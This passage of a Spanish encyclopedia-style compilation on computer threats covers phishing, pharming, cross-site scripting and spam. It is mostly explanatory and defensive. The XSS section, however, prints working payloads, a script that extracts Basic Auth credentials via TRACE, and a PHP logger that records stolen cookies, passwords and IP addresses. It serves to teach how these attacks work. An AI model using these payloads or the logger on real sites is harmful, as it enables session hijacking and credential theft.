Se estima que entre mayo de 2004 y mayo de 2005, aproximadamente 1,2 millones de usuarios de computadoras enlos Estados Unidos tuvieron pérdidas a causa del phishing, lo que suma a aproximadamente $929 millones de dólaresestadounidenses.[19] Los negocios en los Estados Unidos perdieron cerca de 2000 millones de dólares al añomientras sus clientes eran víctimas.[20] El Reino Unido también sufrió el alto incremento en la práctica del phishing.En marzo del 2005, la cantidad de dinero reportado que perdió el Reino Unido a causa de esta práctica fue deaproximadamente £12 millones de libras esterlinas.[21]

Page 99: Virus informático

Phishing 97

Anti-PhishingExisten varias técnicas diferentes para combatir el phishing, incluyendo la legislación y la creación de tecnologíasespecíficas que tienen como objetivo evitarlo.

Respuestas organizativasUna estrategia para combatir el phishing adoptada por algunas empresas es la de entrenar a los empleados de modoque puedan reconocer posibles ataques. Una nueva táctica de phishing donde se envían correos electrónicos de tipophishing a una compañía determinada, conocido como spear phishing, ha motivado al entrenamiento de usuarios envarias localidades, incluyendo la Academia Militar de West Point en los Estados Unidos. En un experimentorealizado en junio del 2004 con spear phishing, el 80% de los 500 cadetes de West Point a los que se les envió uncorreo electrónico falso fueron engañados y procedieron a dar información personal.[22]

Un usuario al que se le contacta mediante un mensaje electrónico y se le hace mención sobre la necesidad de"verificar" una cuenta electrónica puede o bien contactar con la compañía que supuestamente le envía el mensaje, opuede escribir la dirección web de un sitio web seguro en la barra de direcciones de su navegador para evitar usar elenlace que aparece en el mensaje sospechoso de phishing. Muchas compañías, incluyendo eBay y PayPal, siempre sedirigen a sus clientes por su nombre de usuario en los correos electrónicos, de manera que si un correo electrónico sedirige al usuario de una manera genérica como («Querido miembro de eBay») es probable que se trate de un intentode phishing.

Respuestas técnicas

Alerta del navegador Firefox antes de acceder a páginas sospechosas de phishing.

Hay varios programas informáticosanti-phishing disponibles. La mayoría deestos programas trabajan identificandocontenidos phishing en sitios web y correoselectrónicos; algunos software anti-phishingpueden por ejemplo, integrarse con losnavegadores web y clientes de correoelectrónico como una barra de herramientasque muestra el dominio real del sitiovisitado. Los filtros de spam tambiénayudan a proteger a los usuarios de losphishers, ya que reducen el número decorreos electrónicos relacionados con elphishing recibidos por el usuario.

Muchas organizaciones han introducido lacaracterística denominada «preguntasecreta», en la que se pregunta informaciónque sólo debe ser conocida por el usuario yla organización. Las páginas de Internettambién han añadido herramientas de verificación que permite a los usuarios ver imágenes secretas que los usuariosseleccionan por adelantado; sí estas imágenes no aparecen, entonces el sitio no es legítimo.[23] Estas y otras formasde autentificación mutua continúan siendo susceptibles de ataques, como el sufrido por el banco escandinavo Nordeaa finales de 2005.[24]

Muchas compañías ofrecen a bancos y otras entidades que sufren de ataques de phishing, servicios de monitoreocontinuos, analizando y utilizando medios legales para cerrar páginas con contenido phishing.

Page 100: Virus informático

Phishing 98

El [www.apwg.org/ Anti-Phishing Working Group}, industria y asociación que aplica la ley contra las prácticas dephishing, ha sugerido que las técnicas convencionales de phishing podrían ser obsoletas en un futuro a medida que lagente se oriente sobre los métodos de ingeniería social utilizadas por los phishers.[25] Ellos suponen que en un futurocercano, el pharming y otros usos de malware se van a convertir en herramientas más comunes para el robo deinformación.

Respuestas legislativas y judicialesEl 26 de enero de 2004, la FTC (Federal Trade Commission, la Comisión Federal de Comercio) de Estados Unidosllevó a juicio el primer caso contra un phisher sospechoso. El acusado, un adolescente de California, supuestamentecreó y utilizó una página web con un diseño que aparentaba ser la página de America Online para poder robarnúmeros de tarjetas de crédito.[26] Tanto Europa como Brasil siguieron la práctica de los Estados Unidos, rastreandoy arrestando a presuntos phishers. A finales de marzo de 2005, un hombre estonio de 24 años fue arrestadoutilizando una backdoor, a partir de que las víctimas visitaron su sitio web falso, en el que incluía un keylogger quele permitía monitorear lo que los usuarios tecleaban.[27] Del mismo modo, las autoridades arrestaron al denominadophisher kingpin, Valdir Paulo de Almeida, líder de una de las más grandes redes de phishing que en dos años habíarobado entre $18 a $37 millones de dólares estadounidenses.[28] En junio del 2005 las autoridades del Reino Unidoarrestaron a dos hombres por la práctica del phishing,[29] en un caso conectado a la denominada «OperationFirewall» del Servicio Secreto de los Estados Unidos, que buscaba sitios web notorios que practicaban elphishing.[30]

La compañía Microsoft también se ha unido al esfuerzo de combatir el phishing. El 31 de marzo del 2005, Microsoftllevó a la Corte del Distrito de Washington 117 pleitos federales. En algunos de ellos se acusó al denominadophisher "John Doe" por utilizar varios métodos para obtener contraseñas e información confidencial. Microsoftespera desenmascarar con estos casos a varios operadores de phishing de gran envergadura. En marzo del 2005también se consideró la asociación entre Microsoft y el gobierno de Australia para educar sobre mejoras a la ley quepermitirían combatir varios crímenes cibernéticos, incluyendo el phishing.[31]

El phishing como delito

GeneralDiversos países se han ocupado de los temas del fraude y las estafas a través de Internet. Uno de ellos es ellConvenio de Cibercriminalidad de Budapest [32] pero además otros países han dedicado esfuerzos legislativos paracastigar estas acciones .Algunos países ya han incluido el phishing como delito en sus legislaciones, mientras que en otros aún estántrabajando en ello.

ArgentinaEn Argentina, el 19 de septiembre de 2011 fue presentado un proyecto para sancionar el Phishing [33], bajo el Nº deExpediente S-2257/11, Proyecto de Ley para tipificar el Phishing o Captación Ilegítima de Datos [34] en el Senado dela Nación. Mediante este proyecto se busca combatir las diferentes técnicas de obtención ilegítima de informaciónpersonal.

Estados UnidosEn los Estados Unidos, el senador Patrick Leahy introdujo el Ley Anti-Phishing de 2005 el 1 de marzo de 2005. Estaley federal de anti-phishing establecía que aquellos criminales que crearan páginas web falsas o enviaran spam acuentas de correo electrónico con la intención de estafar a los usuarios podrían recibir una multa de hasta $250,000USD y penas de cárcel por un término de hasta cinco años.[35]

Page 101: Virus informático

Phishing 99

Algunos estados tienen leyes que tratan las prácticas fraudulentas o engañosas o el robo de identidad y que tambiénpodría aplicarse a los delitos de phishing. Aquí [36] se puede encontrar los estados que actualmente castigan este tipode delitos.

Referencias[1] Tan, Koon. Phishing and Spamming via IM (SPIM).|Internet Storm Center. (http:/ / isc. sans. org/ diary. php?storyid=1905)/]. 5 de diciembre

de 2010[2] (http:/ / searchsecurity. techtarget. com/ tip/ 0,289483,sid14_gci1193304,00. html). Ed Skoudis. Phone phishing: The role of VoIP in phishing

attacks. 13 de junio de 2006[3] Suplantación o robo de identidad (phishing)a (http:/ / www. ri5. com. ar/ ayudaphishing. php)[4] Stutz, Michael AOL: A Cracker's Paradise? (http:/ / wired-vig. wired. com/ news/ technology/ 0,1282,9932,00. html/ ) 29 de enero de 1998[5] "phishing, n." OED Online, March 2006, Oxford University Press. Oxford English Dictionary Online. (http:/ / dictionary. oed. com/ cgi/

entry/ 30004304/ ). 9 de agosto de 2006[6] "phish, v." OED Online, March 2006, Oxford University Press. Oxford English Dictionary Online. http:/ / dictionary. oed. com/ cgi/ entry/

30004303/ 9 de agosto de 2006[7] Ollmann, Gunter. Phishing Guide: Understanding and Preventing Phishing Attacks. Technical Info. (http:/ / www. technicalinfo. net/ papers/

Phishing. html). 10 de julio de 2006.[8] AOL: A Cracker's Paradise? (http:/ / wired-vig. wired. com/ news/ technology/ 0,1282,9932,00. html/ ). Michael Stutz. Wired News. 29 de

enero de 1998[9] History of AOL Warez (http:/ / www. rajuabju. com/ warezirc/ historyofaolwarez. htm). 28 de septiembre de 2006.[10] Phishing for Clues, Indiana University Bloomington (http:/ / www. browser-recon. info/ ), 15 de septiembre de 2005 (en inglés)[11][11] [http://www.pcworld.com/resource/article/0,aid,125956,pg,1,RSS,RSS,00.asp/ Phishing Scam Takes Aim at MySpace.com. Jeremy Kirk.

IDG Network. 2 de junio de 2006 (en inglés)[12] Tom Jagatic and Nathan Johnson and Markus Jakobsson and Filippo Menczer. Social Phishing (http:/ / www. indiana. edu/ ~phishing/

social-network-experiment/ phishing-preprint. pdf/ ). A publicarse en Communications of the ACM. 3 de junio del 2006. (en inglés)[13] Malicious Website / Malicious Code: MySpace XSS QuickTime Worm (http:/ / www. websense. com/ securitylabs/ alerts/ alert.

php?AlertID=708/ ). Websense Security Labs. 5 de diciembre de 2006.[14] Berners-Lee, Tim. Uniform Resource Locators (http:/ / www. w3. org/ Addressing/ rfc1738. txt/ ), IETF Network Working Group, 28 de

enero de 2006[15] Fisher, Darin. Warn when HTTP URL auth information isn't necessary or when it's provided (https:/ / bugzilla. mozilla. org/ show_bug.

cgi?id=232567). Bugzilla. 28 de agosto de 2005[16] Microsoft. A security update is available that modifies the default behavior of Internet Explorer for handling user information in HTTP and

in HTTPS URLs (http:/ / support. microsoft. com/ kb/ 834489/ ) Microsoft Knowledgebase Database. 28 de agosto de 2005[17] Evgeniy Gabrilovich and Alex Gontmakher. The Homograph Attack (http:/ / www. cs. technion. ac. il/ ~gabr/ papers/ homograph_full. pdf/

).Communications of the ACM 45(2):128. febrero del 2002[18] Johanson, Eric. The State of Homograph Attacks Rev1.1. (http:/ / www. cs. technion. ac. il/ ~gabr/ papers/ homograph_full. pdf/ ) 'The

Shmoo Group. 11 de agosto de 2005.[19] Kerstein, Paul: “How Can We Stop Phishing and Pharming Scams?” (http:/ / www. csoonline. com/ talkback/ 071905. html/ ), CSO, 19 de

julio de 2005.[21] Richardson, Tim: “Brits fall prey to phishing” (http:/ / www. theregister. co. uk/ 2005/ 05/ 03/ aol_phishing/ ), The Register, 3 de mayo de,

2005.[22] Bank, David: “'Spear Phishing' Tests Educate People About Online Scams” (http:/ / online. wsj. com/ public/ article/

0,,SB112424042313615131-z_8jLB2WkfcVtgdAWf6LRh733sg_20060817,00. html?mod=blogs/ ), The Wall Street Journal, 17 de agosto de2005.

[23] “Security: Bank to Require More Than Passwords,” (http:/ / www. cnn. com/ 2005/ TECH/ ptech/ 07/ 14/ banking. security. ap/ index. html/) CNN, July 14, 2005.

[25] Kawamoto, Dawn: “Faced with a rise in so-called pharming and crimeware attacks, the Anti-Phishing Working Group will expand its charterto include these emerging threats.” (http:/ / www. zdnetindia. com/ news/ features/ stories/ 126569. html/ ), ZDNet India, 4 de agosto de 2005.

[26] Legon, Jeordan: “'Phishing' scams reel in your identity” (http:/ / www. cnn. com/ 2003/ TECH/ internet/ 07/ 21/ phishing. scam/ index. html/), CNN, 26 de enero de 2004.

[27] Leyden, John: “Trojan phishing suspect hauled in” (http:/ / www. cnn. com/ 2003/ TECH/ internet/ 07/ 21/ phishing. scam/ index. html/ ),The Register, 4 de abril de 2005.

[28] Leyden, John: “Brazilian cops net 'phishing kingpin'” (http:/ / www. channelregister. co. uk/ 2005/ 03/ 21/ brazil_phishing_arrest/ ), TheRegister, 21 de marzo de 2005.

[29] “UK Phishers Caught, Packed Away,” (http:/ / www. eweek. com/ article2/ 0,1895,1831960,00. asp/ ) eWEEK, junio 27 de 2005.[30] Nineteen Individuals Indicted in Internet 'Carding' Conspiracy. (http:/ / www. cybercrime. gov/ mantovaniIndict. htm/ ) 20 de noviembre del

2005

Page 102: Virus informático

Phishing 100

[31] Microsoft Partners with Australian Law Enforcement Agencies to Combat Cyber Crime. (http:/ / www. microsoft. com/ australia/ presspass/news/ pressreleases/ cybercrime_31_3_05. aspx/ ) 24 de agosto del 2005.

[32] http:/ / www. coe. int/ t/ dghl/ standardsetting/ t-cy/ ETS_185_spanish. PDF[33] Borghello Cristian, Temperini Marcelo Cruzada por la Identidad Digital (http:/ / cruzada. elderechoinformatico. com/ ) Marzo 2012.[34] http:/ / www. senado. gov. ar/ web/ proyectos/ verExpe. php?origen=S& numexp=2257/ 11& tipo=PL& tConsulta=1[35] “Phishers Would Face 5 Years Under New Bill,” (http:/ / informationweek. com/ story/ showArticle. jhtml?articleID=60404811/ )

Information Week, 2 de marzo de 2005.[36] http:/ / www. ncsl. org/ issues-research/ telecom/ state-phishing-laws. aspx

Enlaces externos

Información sobre phishing• Grupo Activo Anti-Phishing (http:/ / www. anti-phishing. org) (en inglés)• Amenazas en la era digital - Informe sobre el Phishing y otras amenazas para las Entidades Financieras (http:/ /

www. iberfinanzas. com/ index. php/ Articulos-informes/ Amenazas-en-la-era-digital. html)• INTECO, equipo que gestiona incidentes de phishing en España (http:/ / cert. inteco. es/ Respuesta_y_Soporte/

Gestion_de_Fraude_Electronico/ )

Legislación• Duke Law & Technology Review (http:/ / www. law. duke. edu/ journals/ dltr/ articles/ 2005dltr0006. html) -

Tapando los agujeros provocados por el phishing: legislación contra tecnología.

PharmingPharming es la explotación de una vulnerabilidad en el software de los servidores DNS (Domain Name System) o enel de los equipos de los propios usuarios, que permite a un atacante redirigir un nombre de dominio (domain name) aotra máquina distinta. De esta forma, un usuario que introduzca un determinado nombre de dominio que haya sidoredirigido, accederá en su explorador de internet a la página web que el atacante haya especificado para ese nombrede dominio.

Origen de la palabraLa palabra pharming deriva del término farm (granja en inglés) y está relacionada con el término phishing, utilizadopara nombrar la técnica de ingeniería social que, mediante suplantación de correos electrónicos o páginas web,intenta obtener información confidencial de los usuarios, desde números de tarjetas de crédito hasta contraseñas.El origen de la palabra se halla en que una vez que el atacante ha conseguido acceso a un servidor DNS o variosservidores (granja de servidores o DNS), se dice que ha hecho un pharming.

Page 103: Virus informático

Pharming 101

Controversia en el uso del términoEn una conferencia organizada por el Anti-Phishing Working Group, Phillip Hallam-Baker definió este términocomo "un neologismo de mercadotecnia diseñado para convencer a banqueros y empresarios de comprar nuevosequipos o accesorios de seguridad".

Método de funcionamiento del pharmingTodos los ordenadores conectados a internet tienen una dirección IP única, que consiste en 4 octetos (4 grupos de 8dígitos binarios) de 0 a 255 separados por un punto (ej: 127.0.0.1). Estas direcciones IP son comparables a lasdirecciones postales de las casas, o al número de los teléfonos.Debido a la dificultad que supondría para los usuarios tener que recordar esas direcciones IP, surgieron los Nombresde Dominio, que van asociados a las direcciones IP del mismo modo que los nombres de las personas van asociadosa sus números de teléfono en una guía telefónica.Los ataques mediante pharming pueden realizarse de dos formas: directamente a los servidores DNS, con lo quetodos los usuarios se verían afectados, o bien atacando a ordenadores concretos, mediante la modificación del fichero"hosts" presente en cualquier equipo que funcione bajo Microsoft Windows o sistemas Unix.La técnica de pharming se utiliza normalmente para realizar ataques de phishing, redirigiendo el nombre de dominiode una entidad de confianza a una página web, en apariencia idéntica, pero que en realidad ha sido creada por elatacante para obtener los datos privados del usuario, generalmente datos bancarios.

Casos reales de pharming• En julio de 2001, varios servidores ISP de Irlanda fueron atacados mediante pharming, y no se resolvió hasta

pasados más de 5 días. Muchas empresas irlandesas se vieron afectadas. El joven alicantino menor de edad querespondía al nick DragonKing fue detenido año y medio más tarde.

• En enero de 2005, el nombre de dominio de un ISP de Nueva York, fue redirigido a un sitio web en Australia.• Hushmail, un proveedor de Secure e-mail, fue atacado mediante pharming el 24 de abril de 2005.• En marzo de 2005, el Senador Estadounidense Patrick Leahy introdujo un artículo de ley Anti-phishing, que

proponía una condena de cinco años de prisión y una sanción económica a los individuos que realizasen ataquesde phishing o utilizasen información obtenida mediante fraude online como phishing y pharming.

Anti-PharmingAnti-Pharming es el término usado para referirse a las técnicas utilizadas para combatir el pharming.Algunos de los métodos tradicionales para combatir el pharming son la utilización de software especializado, laprotección DNS y el uso de addons para los exploradores web, como por ejemplo toolbars.El software especializado suele utilizarse en los servidores de grandes compañías para proteger a sus usuarios yempleados de posibles ataques de pharming y phishing, mientras que el uso de addons en los exploradores webpermite a los usuarios domésticos protegerse de esta técnica.La protección DNS permite evitar que los propios servidores DNS sean vulnerados para realizar ataques pharming.Los filtros anti-spam normalmente no protegen a los usuarios contra esta técnica.

Page 104: Virus informático

Pharming 102

Referencias• "El Pharming: amenaza de fraude a negocios" [1], Terra.• "Fraude a través del pharming", Microsoft (enlace roto disponible en Internet Archive; véase el historial [2] y la última versión [3]).

• "Pharming: Estafa sofisticada" [4], GigaBytes.cl.

Referencias[1] http:/ / www. mx. terra. com/ tecnologia/ interna/ 0,,OI889426-EI4906,00. html[2] http:/ / web. archive. org/ web/ */ http:/ / www. microsoft. com/ spain/ athome/ security/ privacy/ pharming. mspx[3] http:/ / web. archive. org/ web/ 2/ http:/ / www. microsoft. com/ spain/ athome/ security/ privacy/ pharming. mspx[4] http:/ / www. gigabytes. cl/ culpharming. php

Cross-site scriptingXSS, del inglés Cross-site scripting es un tipo de inseguridad informática o agujero de seguridad típico de lasaplicaciones Web, que permite a una tercera parte inyectar en páginas web vistas por el usuario código JavaScript oen otro lenguaje script similar (ej: VBScript), evitando medidas de control como la Política del mismo origen. Estetipo de vulnerabilidad se conoce en español con el nombre de Secuencias de comandos en sitios cruzados.[1]

Es posible encontrar una vulnerabilidad XSS en aplicaciones que tenga entre sus funciones presentar la informaciónen un navegador web u otro contenedor de páginas web. Sin embargo, no se limita a sitios web disponibles enInternet, ya que puede haber aplicaciones locales vulnerables a XSS, o incluso el navegador en sí.XSS es un vector de ataque que puede ser utilizado para robar información delicada, secuestrar sesiones de usuario, ycomprometer el navegador, subyugando la integridad del sistema. Las vulnerabilidades XSS han existido desde losprimeros días de la Web.[2]

Esta situación es usualmente causada al no validar correctamente los datos de entrada que son usados en ciertaaplicación, o no sanear la salida adecuadamente para su presentación como página web.Esta vulnerabilidad puede estar presente de las siguientes formas:• Directa (también llamada Persistente): este tipo de XSS comúnmente filtrado, y consiste en embeber código

HTML peligroso en sitios que lo permitan; incluyendo así etiquetas como <script> o <iframe>.• Indirecta (también llamada Reflejada): este tipo de XSS consiste en modificar valores que la aplicación web

utiliza para pasar variables entre dos páginas, sin usar sesiones y sucede cuando hay un mensaje o una ruta en laURL del navegador, en una cookie, o cualquier otra cabecera HTTP (en algunos navegadores y aplicaciones web,esto podría extenderse al DOM del navegador).

XSS Indirecto (reflejado)Supongamos que un sitio web tiene la siguiente forma:

http:/ / www. example. com/ home. asp?frame=menu. asp

y que al acceder se creará un documento HTML enlazando con un frame a menu.asp.En este ejemplo, ¿qué pasaría si se pone como URL del frame un código javascript?

javascript:while(1)alert("Este mensaje saldra indefinidamente");

Si este enlace lo pone un atacante hacia una víctima, un visitante podrá verlo y verá que es del mismo dominio,suponiendo que no puede ser nada malo y de resultado tendrá un bucle infinito de mensajes.

Page 105: Virus informático

Cross-site scripting 103

Un atacante en realidad trataría de colocar un script que robe las cookies de la víctima, para después poderpersonificarse como con su sesión, o hacer automático el proceso con el uso de la biblioteca cURL o alguna similar.De esta forma, al recibir la cookie, el atacante podría ejecutar acciones con los permisos de la víctima sin siquieranecesitar su contraseña.Otro uso común para estas vulnerabilidades es lograr hacer phishing. Quiere ello decir que la víctima ve en la barrade direcciones un sitio, pero realmente está en otra. La víctima introduce su contraseña y se la envía al atacante.Una página como la siguiente:

error.php?error=Usuario%20Invalido

es probablemente vulnerable a XSS indirecto, ya que si escribe en el documento "Usuario Inválido", esto significaque un atacante podría insertar HTML y JavaScript si así lo desea.Por ejemplo, un tag como <script> que ejecute código javascript, cree otra sesiónbajo otro usuario y mande la sesión actual al atacante.

Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido de una cookie de forma sencilla,usando el siguiente script. Sólo se debe colocar en la barra de direcciones, y presionar 'Enter'.

javascript:void prompt("Introduce la

cookie:",document.cookie).replace(/[^;]+/g,function(_){document.cookie=_;});

XSS Directo (persistente)Funciona localizando puntos débiles en la programación de los filtros de HTML si es que existen, para publicarcontenido (como blogs, foros, etc.).Normalmente el atacante tratara de insertar tags como <iframe>, o <script>, pero en caso de fallar, el atacante puedetratar de poner tags que casi siempre están permitidas y es poco conocida su capacidad de ejecutar código. De estaforma el atacante podría ejecutar código malicioso.Ejemplos:

Una posibilidad es usar atributos que permiten ejecutar código.

<BR SIZE="&{alert('XSS')}">

<FK STYLE="behavior: url(http://yoursite/xss.htc);">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

También se puede crear un DIV con background-image: url(javascript:eval(this.fu)) comoestilo y añadir al DIV un campo llamado fu que contenga el código a ejecutar, por ejemplo:

<div fu="alert('Hola mundo');" STYLE="background-image: url(javascript:eval(this.fu))">

Page 106: Virus informático

Cross-site scripting 104

AJAXUsar AJAX para ataques de XSS no es tan conocido, pero sí peligroso. Se basa en usar cualquier tipo devulnerabilidad de XSS para introducir un objeto XMLHttp y usarlo para enviar contenido POST, GET, sinconocimiento del usuario.Este se ha popularizado con gusanos de XSS que se encargan de replicarse por medio de vulnerabilidades de XSSpersistentes (aunque la posibilidad de usar XSS reflejados es posible).El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticación de un sistema basado enAutenticación Básica (Basic Auth). Sólo falta decodificarlo, pero es más fácil mandarlo codificado al registro decontraseñas. La codificación es base64.Script para obtener credenciales en tipo BASIC

Esta técnica también es llamada XST, Cross Site Tracing.

var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");

// para firefox, es: var xmlhttp = new XMLHttpRequest();

xmlhttp.open("TRACE","./",false);

xmlhttp.send(null);

str1=xmlhttp.responseText;

splitString = str1.split("Authorization: Basic ");

str2=splitString[1];

str3=str2.match(/.*/)[0];

alert(str3);

Por cuestiones de seguridad, Mozilla Firefox y el Internet Explorer 6.2+ no permiten usar el metodo TRACE.Y este código guardaría un log con las cookies que enviaría el atacante.

<?php

$archivo = fopen('log2.htm','a');

$cookie = $_GET['c'];

$usuario = $_GET['id'];

$ip = getenv ('REMOTE_ADDR');

$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");

Page 107: Virus informático

Cross-site scripting 105

fwrite($archivo, '<hr>USUARIO Y PASSWORD:

'.htmlentities(base64_decode($usuario)));

fwrite($archivo, '<br />Cookie: '.htmlentities($cookie).'<br />Pagina:

'.htmlentities($re));

fwrite($archivo, '<br /> IP: ' .$ip. '<br /> Fecha y Hora: ' .$fecha. '</hr>');

fclose($archivo);

?>

Enlaces externos• XSS FAQ [3]

• Ejemplo completo (SOAagenda.com) [4]

• JaSiLDBG [5]

• XSS Cheat Sheet [6]

• Ejemplo de problemas generados por una vulnerabilidad de XSS [7]

• Filtro anti-XSS para aplicaciones web basadas en Java [8]

Notas y referencias[1] INTECO: Tipos de Vulnerabilidades http:/ / cert. inteco. es/ Formacion/ Amenazas/ Vulnerabilidades/ Tipos_Vulnerabilidades/[3] http:/ / www. cgisecurity. com/ articles/ xss-faq. shtml[4] http:/ / soaagenda. com/ journal/ articulos/ cross-site-scripting/[5] http:/ / jasildbg. googlepages. com/[6] http:/ / ha. ckers. org/ xss. html[7] http:/ / www. hacktimes. com/ robo_de_sesiones_http_mediante_xss/[8] http:/ / ricardozuasti. com/ 2012/ stronger-anti-cross-site-scripting-xss-filter-for-java-web-apps/

Page 108: Virus informático

Spam 106

Spam

Una carpeta KMail llena de correos no deseados recibidos en un corto período.

Se llama spam, correo basura o mensajebasura a los mensajes no solicitados, nodeseados o de remitente no conocido (correoanónimo), habitualmente de tipopublicitario, generalmente enviados engrandes cantidades (incluso masivas) queperjudican de alguna o varias maneras alreceptor. La acción de enviar dichosmensajes se denomina spamming. Lapalabra spam proviene de la segunda guerramundial, cuando los familiares de lossoldados en guerra les enviaban comidaenlatada; entre estas comidas enlatadasestaba una carne enlatada llamada spam, que en los Estados Unidos era y sigue siendo muy común.[1][2]

Aunque se puede hacer spam por distintas vías, la más utilizada entre el público en general es la basada en el correoelectrónico. Otras tecnologías de Internet que han sido objeto de correo basura incluyen grupos de noticias, usenet,motores de búsqueda, redes sociales, páginas web wiki, foros, web logs (blogs), a través de ventanas emergentes ytodo tipo de imágenes y textos en la web.El correo basura también puede tener como objetivo los teléfonos móviles (a través de mensajes de texto) y lossistemas de mensajería instantánea como por ejemplo Outlook, Lotus Notes,Windows live ,etc.También se llama correo no deseado a los virus sueltos en la red y páginas filtradas (casino, sorteos, premios, viajes,drogas, software y pornografía), se activa mediante el ingreso a páginas de comunidades o grupos o acceder aenlaces en diversas páginas o inclusive sin antes acceder a ningún tipo de páginas de publicidad.De todas formas, el spam ha tomado una resemantización dentro del contexto de foros, siendo considerado spamcuando un usuario publica algo que desvirtúa o no tiene nada que ver con el tema de conversación.[3] También, enalgunos casos, un mensaje que no contribuye de ninguna forma al tema es considerado spam. Una tercera forma deSpamming en foros es cuando una persona publica repetidamente mensajes acerca de un tema en particular en unaforma indeseable (y probablemente molesta) para la mayor parte del foro. Finalmente, también existe el caso en queuna persona publique mensajes únicamente con el fin de incrementar su rango, nivel o número de mensajes en elforo.

HistoriaEl correo basura mediante el servicio de correo electrónico nació el 5 de marzo de 1994. Este día una firma deabogados, Canter and Siegel, publica en Usenet un mensaje de anuncio de su firma legal; el día después de lapublicación, facturó cerca de 10.000 dólares por casos de sus amigos y lectores de la red. Desde ese entonces, elmarketing mediante correo electrónico ha crecido a niveles impensados desde su creación.Aunque existen otras versiones que datan su origen el 3 de mayo de 1978, cuando 393 empleados de ARPANET, elpredecesor de Internet gestionado por el gobierno estadounidense, recibían con sorpresa un correo de la compañía deordenadores DEC invitándoles al lanzamiento de un nuevo producto.[4]

El correo basura por medio del fax (spam-fax), es otra de las categorías de esta técnica de marketing directo, yconsiste en enviar faxes masivos y no solicitados a través de sistemas electrónicos automatizados hacia miles depersonas o empresas cuya información ha sido cargada en bases de datos segmentadas según diferentes variables.

Page 109: Virus informático

Spam 107

Historia del término

Lata de spam.

La palabra spam tiene raíces estadounidenses. La empresa charcuteraestadounidense Hormel Foods lanzó en 1937 una carne en lataoriginalmente llamada Hormel's Spiced Ham.[] El Spam (de lacontracción de "Spiced Ham", en español "jamón con especias") fue elalimento de los soldados soviéticos y británicos en la Segunda GuerraMundial, y desde 1957 fue comercializado en latas que ahorraban alconsumidor el uso del abrelatas.

Más adelante, el grupo británico Monty Python empezó a hacer burlade la carne en lata. En un sketch de su programa Monty Python'sFlying Circus,[5] cuando una pareja intentaba pedir comida en unacafetería, se encontraba con que todos los platos del menú conteníanspam: «Huevos con tocino; huevos, salchicha y tocino; huevos conspam; huevos, salchicha, tocino y spam; spam, tocino, salchichas yspam; spam, huevos, spam, spam» — y así sucesivamente. Un grupo de vikingos (la mayor productora de Spam enEuropa era una compañía danesa) cantaba, sin motivo aparente: «Spam, spam, spam, querido spam, maravillosospam».[]

Años después, cuando Internet comenzaba a crecer, algunos usuarios inexpertos mandaban erróneamente mensajespersonales a toda una lista de correo electrónico o a grupos de discusión —que podían involucrar a varios cientos depersonas— lo que ocasionaba molestias y pérdida de tiempo (y hasta de dinero) a los demás usuarios que recibíanese tráfico irrelevante y no deseado. Según Brad Templeton,[6] hacia 1993 alguien calificó esas intromisiones nodeseadas como spam: los mensajes eran como el spam del sketch, en el que nada se podía comer sin toparse con elfiambre.[]

Correo masivo en diferentes medios

Spam en los blogsEs una técnica de correo basura relativamente nueva, que surge con el auge de los blogs. Consiste en dejar uncomentario en una entrada, que por lo general no tiene nada que ver con la misma sino que tiene enlaces a sitioscomerciales, o promociona algún producto. El Akismet,[7] es un complemento para WordPress que detectaautomáticamente los comentarios con tendencia a ser correo masivo.

Spam en el correo electrónicoEl correo masivo supone actualmente la mayor parte de los mensajes electrónicos intercambiados en Internet, siendoutilizado para anunciar productos y servicios de dudosa calidad. Rolex, eBay y viagra son los asuntos de losmensajes que compiten por el primer lugar en las clasificaciones de spam.[8][9][10][11][12]

Usualmente los mensajes indican como remitente del correo una dirección falsa. Por esta razón, no sirve de nadacontestar a los mensajes de spam: las respuestas serán recibidas por usuarios que nada tienen que ver con ellos. Porahora, el servicio de correo electrónico no puede identificar los mensajes de forma que se pueda discriminar laverdadera dirección de correo electrónico del remitente, de una falsa. Esta situación que puede resultar chocante enun primer momento, es semejante por ejemplo a la que ocurre con el correo postal ordinario: nada impide poner enuna carta o postal una dirección de remitente aleatoria: el correo llegará en cualquier caso. No obstante, haytecnologías desarrolladas en esta dirección: por ejemplo el remitente puede firmar sus mensajes mediantecriptografía de clave pública.

Page 110: Virus informático

Spam 108

Los filtros automáticos antispam analizan el contenido de los mensajes buscando, por ejemplo, palabras como rolex,viagra, y sex que son las más usuales en los mensajes no deseados. No se recomienda utilizar estas palabras en lacorrespondencia por correo electrónico: el mensaje podría ser calificado como no deseado por los sistemasautomáticos anti correo masivo.[cita requerida]

Spam en forosEl spam, dentro del contexto de foros, es cuando un usuario publica algo que desvirtúa o no tiene nada que ver con eltema de conversación.[13] También, en algunos casos, un mensaje que no contribuye de ninguna forma al tema esconsiderado spam. Una tercera forma de Spamming en foros es cuando una persona publica repetidamente mensajesacerca de un tema en particular en una forma indeseable (y probablemente molesta) para la mayor parte del foro.Finalmente, también existe el caso en que una persona publique mensajes únicamente con el fin de incrementar surango, nivel o número de mensajes en el foro.El spam en un foro de Internet también se produce cuando un usuario pública comentarios que contienen enlaces oalgún tipo de referencia hacia algún sitio web o foro similar, de igual contenido, o incluso ajeno al mismo, así comocualquier otro objetivo típico de publicidad, con el objetivo de atraer más usuarios y visitantes al mismo.Últimamente se están abriendo hilos especiales dedicados al spam, para que los usuarios que quieran postear noralenticen los demás hilos. Estos hilos dedicados al spam han cobrado verdadera importancia y resultan muy usados,tanto es así que algunos foros después de tenerlos largo tiempo decidieron eliminarlos debido al hecho de que enmuchas ocasiones estos subforos o temas eran muchos más usados que el resto de partes del foro principal, es decir,mientras que en spam se posteaban más de 50 mensajes diarios, en algunos casos, en el resto de apartados apenas selograban 2 ó 3 publicaciones. De aquí, se han despertado nuevos movimientos, que han desarrollado comunidades enlínea dedicadas 100% al spam, como spamloco, spamfestuy y espamearte, entre los más añejos.

Spam en las redes socialesEs una nueva forma de correo basura que consiste en enviar publicidad, ofertas de empleo, publicidad directamente alos usuarios de redes sociales profesionales sin que éstos lo hayan solicitado o en los foros de la red social.Dos ejemplos de correo no deseado corporativo en este sector son el envío de invitaciones no solicitadas a loscontactos de usuarios de Facebook, y la "respuesta automática" con publicidad que aleatoriamente se hace desdeMSN Hotmail cuando alguien envía un mensaje a un buzón de dicha corporación.

Tambien es muy normal encontar el 'spam en twitter cuando los fans locos acosan a sus idolos.

